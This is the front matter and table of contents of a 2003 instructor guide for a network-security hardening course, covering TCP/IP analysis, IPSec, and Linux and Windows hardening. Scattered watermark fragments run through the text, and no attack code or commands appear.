SCNP Hardening

INSTRUCTOR GUIDE
Ed or ru ct st In
DO NO T DU PL IC
Hardening The Infrastructure (SCP)
AT
iti
on
Ed or ru ct st In
DO NO T DU PL IC
AT
iti
on
HARDENING THE INFRASTRUCTURE (SCP)

ACKNOWLEDGEMENTS
Project Team
Project Support
NOTICES
or
DO NO
ru ct
ii Hardening The Infrastructure (SCP)
TRADEMARK NOTICES: Element K and the Element K logo are trademarks of Element K LLC. The Security Certied Program is a registered trademark of Ascendant Learning, LLC, in the U.S. and other countries; the Security Certied Program products and services discussed or described may be trademarks of Ascendant Learning, LLC. All other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors. Copyright 2003 Element K Content LLC. All rights reserved. Screenshots and IP addresses used for illustrative purposes are the property of the software proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written permission of Element K, 500 Canal View Boulevard, Rochester, NY 14623, (585) 240-7500, (800) 4343466. Element K Press LLCs World Wide Web site is located at www.elementkcourseware.com. The glossary contains terms from the National Security Agency (NSA) and is reprinted with permission. Reproduction of these terms in any format without the explicit written consent of Element K or the NSA is strictly prohibited. The section that discusses IIS 5 exploits and alerts has been printed with permission from eEye Digital Security. Copyright 1998-2001 eEye Digital Security. This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Element K materials are being reproduced or transmitted without permission, please call 1-800-478-7788.
In
st
DU
PL
IC
DISCLAIMER: While Element K Press LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or tness for a particular purpose. The names and IP addresses used in the data les for this course are those of a ctitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyones name or IP address in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Element K is an independent provider of integrated training solutions for individuals, businesses, educational institutions, and government agencies. Use of screenshots, photographs of another entitys products, or another entitys product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship or endorsement of the book by, nor any afliation of such entity with Element K. Some of the tools and procedures presented in this course could cause problems if used improperly or maliciously in a live network environment. These tools are not a threat in any simulated activities presented here, nor are they a threat when presented as part of instructor-led training in a closed classroom environment. However, the installation and use of the programs or procedures presented outside of a controlled environment is the sole responsibility of the end-user and may result in criminal prosecution. Element K does not endorse or recommend the illegal use of any of the scanning or hacking tools described in this course. This courseware contains links to sites on the Internet that are owned and operated by third parties (theExternal Sites). Element K is not responsible for the availability of, or the content located on or through, any External Site. Please contact Element K if you have any concerns regarding such links or External Sites.
Ed
Development Assistance: Robert Young, David Young, Steve Richter and Pamela J. Taylor Content Manager: Clare Dygert
AT
iti
Curriculum Developer and Technical Writers: Warren Peterson, Shrinath Tandur and Uday O. Ali Pabrai Copy Editors: Carin Peterson and Laura Thomas Reviewing Editor: Christy D. Johnson Technical Editors: Charles Nicchia and Cory Brown Quality Assurance Analysts: Tracy Andrews, Frank Wosnick and Lance Anderson Graphics Designer: Isolina Salgado Toner
on
Course Number: NH85545 (IGEE) Course Edition: 1.1 For software version: NA

About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix
CONTENT OVERVIEW
Lesson 1: Advanced TCP/IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Lesson 2: Implementing IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Lesson 3: Hardening Linux Computers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 Lesson 4: Hardening Windows Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
Lesson 5: Routers and Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
ru ct
Appendix A: Hardening the Infrastructure Exam Objectives . . . . . . . . . . . . . . . . . . 543
Glossary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
st
In
DO
NO
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 567
DU
PL
IC
Contents
Lesson 8: Attack Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
or
Lesson 7: Security on the Internet and the WWW . . . . . . . . . . . . . . . . . . . . . . . . . 421
AT
E
iii
Lesson 6: Contingency Planning. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
Ed
iti
on
CONTENTS
CONTENTS
LESSON 1: ADVANCED TCP/IP

Topic 1A
or
DO NO
ru ct
st
In
Topic 1C Topic 1D Topic 1E
Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . . 35 Task 1C-1 Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . 37 Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 38 Task 1D-1 Capturing and Identifying ICMP Messages . . . . . . . . . . . . . . 39 Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . . 40 Task 1E-1 Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . 42
iv
DU
PL
Topic 1B
Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . . Connections. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1B-1 Using Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . Ethereal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1B-2 Installing and Starting Ethereal . . . . . . . . . . . . . . . . . . . . . Ethereal Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1B-3 Using Ethereal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . TCP Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1B-4 Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . The Session Teardown Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1B-5 Analyzing the Session Teardown Process . . . . . . . . . . . . . . .
IC
TCP/IP Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . RFCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . The Function of IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . The Subnet Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1A-1 Layering and Address Conversions . . . . . . . . . . . . . . . . . . . . Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . VLSM and CIDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X-casting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1A-2 Routers and Subnetting . . . . . . . . . . . . . . . . . . . . . . . . . .
Ed
iti
AT
About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix Course Setup Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiv How To Use This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l
on
E
3 6 7 10 12 12 13 14 14 16 18 20 22 27 28 29 29 32 33 33 34 35
Topic 1F Topic 1G Topic 1H
Capturing and Identifying UDP Headers . . . . . . . . . . . . . . . . 43 Task 1F-1 Working with UDP Headers . . . . . . . . . . . . . . . . . . . . . . . . 43 Analyzing Packet Fragmentation. . . . . . . . . . . . . . . . . . . . . . . 44 Task 1G-1 Analyzing Fragmentation . . . . . . . . . . . . . . . . . . . . . . . . . . 45 46 46 49 50
CONTENTS
Analyzing an Entire Session . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1H-1 Performing a Complete ICMP Session Analysis . . . . . . . . . . . Continuing the Complete Session Analysis. . . . . . . . . . . . . . . . . . . . . . Task 1H-2 Performing a Complete FTP Session Analysis. . . . . . . . . . . . .
Ed
DU T PL
78 79 80 81 81 81 82 83 83 84 84 84 85 86 88
or
DO NO
LESSON 2: IMPLEMENTING IPSEC

Topic 2A
Internet Protocol Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IPSec Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 2A-1 Describing the Need for IPSec . . . . . . . . . . . . . . . . . . . . . . IPSec Policy Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . The MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 2B-1 Examining the MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IPSec Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 2B-2 Identifying Default IPSec Security Policies . . . . . . . . . . . . . . Saving the Customized MMC Configuration . . . . . . . . . . . . . . . . . . . . . Task 2B-3 Saving a Customized MMC . . . . . . . . . . . . . . . . . . . . . . . . . The Secure Server (Require Security) Policy . . . . . . . . . . . . . . . . . . . . . Task 2B-4 Examining Security Methods . . . . . . . . . . . . . . . . . . . . . . . The Rules Tab for the Secure Server (Require Security) Policy. . . . . . . Task 2B-5 Examining Policy Rules . . . . . . . . . . . . . . . . . . . . . . . . . . .
In
st
Topic 2B
ru ct
IC
Contents
AT
iti
v
Topic 1I
Fundamentals of IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IPv6 Addresses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Unicasting and Multicasting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IPv6 Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-1 Installing IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IPv6 Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-2 Getting Another 6-over-4 Address . . . . . . . . . . . . . . . . . . . . IPv6 Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-3 Interface Initializing . . . . . . . . . . . . . . . . . . . . . . . . . . . . Using the ipsec6.exe Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-4 Using the ipsec6 Command . . . . . . . . . . . . . . . . . . . . . . . . Using the ping6.exe Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-5 Using the ping6 Command . . . . . . . . . . . . . . . . . . . . . . . . Capturing and Analyzing IPv6 Traffic . . . . . . . . . . . . . . . . . . . . . . . . . . Task 1I-6 Capturing and Analyzing IPv6 Traffic . . . . . . . . . . . . . . . . . Lesson Review 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
62 62 63 64 64 66 68 68 69 69 69 70 70 71 71 72
on
CONTENTS
Topic 2C
ru ct
Topic 2D
In
IPSec ESP Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . .108 Implementing a Request ESP IPSec Policy . . . . . . . . . . . . . . . . . . . . . . 108 Task 2D-1 Creating the 3_REQUEST_ESP(des)_only IPSec Policy . . . . . . . 108 Configuring the ESP IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . 110 Task 2D-2 Creating the 3_RESPOND_ESP(des)_only IPSec Policy . . . . . . . 110 ESP Request-and-Response Session Analysis . . . . . . . . . . . . . . . . . . . . 111 Task 2D-3 Enabling IPSec ESP Policies . . . . . . . . . . . . . . . . . . . . . . . . 112 Implementing an ESP IPSec Session. . . . . . . . . . . . . . . . . . . . . . . . . . . 113 Task 2D-4 Configuring and Analyzing an ESP IPSec Session . . . . . . . . . 113 ESP Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114 Creating a Require ESP IPSec Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . 114 Task 2D-5 Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy . . . 114 Configuring a Require ESP IPSec Session . . . . . . . . . . . . . . . . . . . . . . . 115 Task 2D-6 Require-and-Respond ESP Implementation and Analysis . . . . . 116 Combining AH and ESP in IPSec . . . . . . . . . . . . . . . . . . . . . . .117 Task 2E-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
st
Topic 2E
vi
DO
NO
DU
PL
IPSec AH Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Task 2C-1 Preparing the System Setup and Configuration . . . . . . . . . . . 90 Creating Custom IPSec Policies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Task 2C-2 Creating the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . 93 Editing Authentication Method Policies . . . . . . . . . . . . . . . . . . . . . . . . 95 Task 2C-3 Editing the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . . 95 Setting Up the Computers Response . . . . . . . . . . . . . . . . . . . . . . . . . . 96 Task 2C-4 Configuring the Policy Response . . . . . . . . . . . . . . . . . . . . . 97 Configuring AH in Both Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98 Task 2C-5 Configuring the Second Computer . . . . . . . . . . . . . . . . . . . . 98 Configuring FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 Task 2C-6 Setting Up the FTP Process . . . . . . . . . . . . . . . . . . . . . . . . 100 Implementing the IPSec Policy. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 Task 2C-7 Implementing the 1_REQUEST_AH(md5)_only Policy . . . . . . . 101 Request-only Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101 Task 2C-8 Analyzing the Request-only Session . . . . . . . . . . . . . . . . . . 102 Implementing a Request-and-Respond Policy . . . . . . . . . . . . . . . . . . . 102 Task 2C-9 Configuring a Request-and-Respond IPSec Session . . . . . . . . 102 Request-and-Respond Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . 103 Task 2C-10 Analyzing the Request-and-Respond Session . . . . . . . . . . . . 103 Implementing a Require IPSec Policy . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Task 2C-11 Implementing the 2_REQUIRE_AH(md5)_only Policy . . . . . . . 104 Mismatched AH Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 Task 2C-12 Attempting to Use Different IPSec Policies . . . . . . . . . . . . . 106 Mismatched IPSec Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 106 Task 2C-13 Analyzing a Mismatched IPSec Policy Session . . . . . . . . . . . . 106 Implementing and Analyzing the Require Response Policy . . . . . . . . . 107 Task 2C-14 Implementing and Analyzing a Require IPSec Policy Session . . 107
Ed
or
IC
AT
iti
on
Topic 3B
Fundamental Linux Security . . . . . . . . . . . . . . . . . . . . . . . . . .162 File and Directory Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162 Task 3B-1 Creating Object Ownerships . . . . . . . . . . . . . . . . . . . . . . . . 166 Assigning Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 Task 3B-2 Assigning Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 Testing Assigned Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Contents vii
In
Introduction to Linux Administration . . . . . . . . . . . . . . . . . .138 Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Basic Navigation in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Task 3A-1 Navigating in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 User and Group Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Task 3A-2 Creating and Modifying Users and Groups . . . . . . . . . . . . . . 150 Switching User Accounts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Linux File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Task 3A-3 Viewing File Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 Object Ownership . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 Webmin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157 Task 3A-4 Installing Webmin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 System Information. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 Task 3A-5 Viewing System Information . . . . . . . . . . . . . . . . . . . . . . . 162
ru ct
st
DO
NO
DU
PL
Topic 3A
IC
LESSON 3: HARDENING LINUX COMPUTERS
or
AT
Configuring the IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 Task 2E-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy . . . . 119 AH and ESP IPSec Session Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 Task 2E-3 Configuring and Analyzing an IPSec Session Using AH and ESP. 121 Requiring AH and ESP in an IPSec Session. . . . . . . . . . . . . . . . . . . . . . 122 Task 2E-4 Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy . . . . 123 Using Mismatched AH and ESP IPSec Policies . . . . . . . . . . . . . . . . . . . 124 Task 2E-5 Matching and Analyzing AH and ESP IPSec Policies . . . . . . . . 124 Configuring All the Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125 Task 2E-6 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . 126 Configuring the AH-and-ESP IPSec Response Policy. . . . . . . . . . . . . . . 127 Task 2E-7 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy . 127 Implementing the Full IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . 128 Task 2E-8 Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 Using the Filter Lists. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 Task 2E-9 Editing Filter Lists to Explicitly Secure Traffic . . . . . . . . . . . 130 Using Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Task 2E-10 Using Certificates for Authentication. . . . . . . . . . . . . . . . . . 132 Disabling IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134 Task 2E-11 Removing IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134 Lesson Review 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
CONTENTS
Ed
iti
on
CONTENTS
Topic 3C
Topic 3D
ru ct st
viii Hardening The Infrastructure (SCP)
In
DO
NO
DU
PL
IC
Topic 3E
Final OS Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .210 Removing Services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 Task 3E-1 Stopping Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 212 Linux Run Levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Task 3E-2 Configuring an SSH Server . . . . . . . . . . . . . . . . . . . . . . . . . 214 Configuring and Using the SSH Client . . . . . . . . . . . . . . . . . . . . . . . . . 214 Task 3E-3 Configuring an SSH Client . . . . . . . . . . . . . . . . . . . . . . . . . 215 Tripwire . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 Task 3E-4 Starting Tripwire . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220 Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224 Task 3E-5 Logging Recent Login Activity . . . . . . . . . . . . . . . . . . . . . . 226 The xferlog Log File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 Web Server Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 The secure Log File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 Using the Log Viewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228 Task 3E-6 Using the Log Viewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228 Securing Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229 Bastille . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229 Task 3E-7 Installing and Exploring Bastille . . . . . . . . . . . . . . . . . . . . 231 Lesson Review 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
or
AT
Securing Network Services. . . . . . . . . . . . . . . . . . . . . . . . . . . .194 NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194 Task 3D-1 Sharing Data with NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . 200 Securing NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200 Task 3D-2 Verifying Export Permissions . . . . . . . . . . . . . . . . . . . . . . . 202 NIS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202 What is Samba? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203 Task 3D-3 Configuring the Samba Server . . . . . . . . . . . . . . . . . . . . . . 207
Ed
iti
Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .183 TCP Wrappers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183 Task 3C-1 Controlling Access with TCP Wrappers . . . . . . . . . . . . . . . . . 187 The xinetd Superdaemon. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187 Task 3C-2 Managing Telnet with xinetd . . . . . . . . . . . . . . . . . . . . . . . 193
on
Task 3B-3 Verifying Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168 The SetUID, SetGID, and the Sticky Bit Permissions . . . . . . . . . . . . . . 169 Task 3B-4 Configuring umask Settings . . . . . . . . . . . . . . . . . . . . . . . . 172 Password Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172 Task 3B-5 Viewing the Password Files . . . . . . . . . . . . . . . . . . . . . . . . 176 Managing Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176 Task 3B-6 Managing Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Pluggable Authentication Modules (PAM) . . . . . . . . . . . . . . . . . . . . . . 177 Security Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
LESSON 4: HARDENING WINDOWS COMPUTERS

Topic 4A
Windows 2000 Infrastructure Security. . . . . . . . . . . . . . . . . .236 Active Directory Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 Windows 2000 DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241 Group Policy Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242 Group Policy Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242 Task 4A-1 Configuring a Custom MMC and GPO . . . . . . . . . . . . . . . . . . 243 Editing GPOs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243 Task 4A-2 Editing a GPO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244 Enforcing GPOs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244 Task 4A-3 Implementing Multiple GPOs . . . . . . . . . . . . . . . . . . . . . . . 245
CONTENTS
Topic 4B
or
DO NO
Topic 4C
Windows 2000 Security Configuration Tools . . . . . . . . . . . . .253 The Gold Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253 User and Group Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253 Restricting Logon Hours . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253 Expiration Dates for User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . 254 Configuring Windows 2000 Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254 Locking Down the Administrator Account . . . . . . . . . . . . . . . . . . . . . . 255 Task 4C-1 Securing Administrator Account Access . . . . . . . . . . . . . . . . 256 Testing Administrative Access. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258 Task 4C-2 Testing Administrative Access . . . . . . . . . . . . . . . . . . . . . . 258 Group Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259 Local Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260 Task 4C-3 Verifying Password Requirements . . . . . . . . . . . . . . . . . . . . 260 Password Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261 Security Templates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262 Task 4C-4 Analyzing Default Password Settings of Security Templates . . . 264 Custom Security Templates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264 Task 4C-5 Creating a Custom Security Template . . . . . . . . . . . . . . . . . 264 Security Configuration and Analysis Snap-In . . . . . . . . . . . . . . . . . . . . 265 Task 4C-6 Investigating the Security Configuration and Analysis Snap-In. 266 Template Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266 Task 4C-7 Implementing the Template . . . . . . . . . . . . . . . . . . . . . . . . 267 The secedit.exe Utility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267 Task 4C-8 Analyzing the Current Security Settings of the Local System. . 267
ru ct
In
st
DU
PL
IC
Contents
AT
E
ix
Windows 2000 Authentication . . . . . . . . . . . . . . . . . . . . . . . .246 Authentication Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246 SYSKEY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249 The Challenge and Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 250 Windows 2000 Local Logon Process . . . . . . . . . . . . . . . . . . . . . . . . . . . 250 Kerberos in Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251 Smart Cards in Windows 2000. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252 Task 4B-1 Configuring NTLMv2 Authentication . . . . . . . . . . . . . . . . . . 252
Ed
iti
on
CONTENTS
Analyzing and Implementing the Gold Standard . . . . . . . . . . . . . . . . . 268 Task 4C-9 Configuring Policies to the Gold Standard . . . . . . . . . . . . . . 269 Analyzing the Gold Standard. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269 Task 4C-10 Analyzing the Gold Standard . . . . . . . . . . . . . . . . . . . . . . . 270
Topic 4E
ru ct
Topic 4F Topic 4G
Windows 2000 Auditing and Logging. . . . . . . . . . . . . . . . . . .283 Object Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285 Task 4E-1 Enabling Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286 Registry Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286 Task 4E-2 Logging SAM Registry Access . . . . . . . . . . . . . . . . . . . . . . . 287 Managing the Event Viewer. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288 Task 4E-3 Viewing the Registry Audit . . . . . . . . . . . . . . . . . . . . . . . . 290 Event IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291 Authentication Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291 Task 4E-4 Creating Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293 Viewing Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294 Task 4E-5 Viewing Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294 Managing Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
Ed
T DU
or
DO NO
Windows 2000 EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .296 Task 4F-1 Encrypting Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
